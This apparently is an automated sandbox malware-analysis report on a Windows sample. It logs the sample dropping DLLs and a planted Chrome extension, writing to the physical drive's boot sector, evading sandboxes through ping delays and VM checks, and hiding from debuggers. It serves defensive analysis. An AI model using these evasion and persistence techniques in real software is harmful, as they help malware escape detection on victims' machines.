Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.jsonJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D7E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DA70
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d3_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d3_2_1001D7E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445BD3 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00445BD3
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\1612045890161.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100204C00_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100204C03_2_100204C0
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,0_2_10019780
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100204C03_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100204C00_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe TID: 5436Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 4928Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 3920Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW,0_2_0042A5EF
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001A170 FindFirstFileA,FindClose,3_2_1001A170
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004594D0 GetModuleHandleW,GetProcAddress,GetSystemInfo,0_2_004594D0
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271537033.0000000003EFD000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284702540.0000000003F37000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.245376573.0000000002A41000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.247321967.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter}V\
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.274136124.00000000007A8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWZ
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270949659.0000000003EF1000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.274971409.0000000002DED000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.245393677.0000000002A6D000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.274971409.0000000002DED000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.261822382.0000000000799000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: ecvB803.tmp.11.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4f67defbf95d422b8052c59b06ee26b9&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284726946.0000000003F64000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPIxu
Source: C:\Users\user\AppData\Roaming\1612045890161.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_10019FF0
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0044D67E
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0044D67E
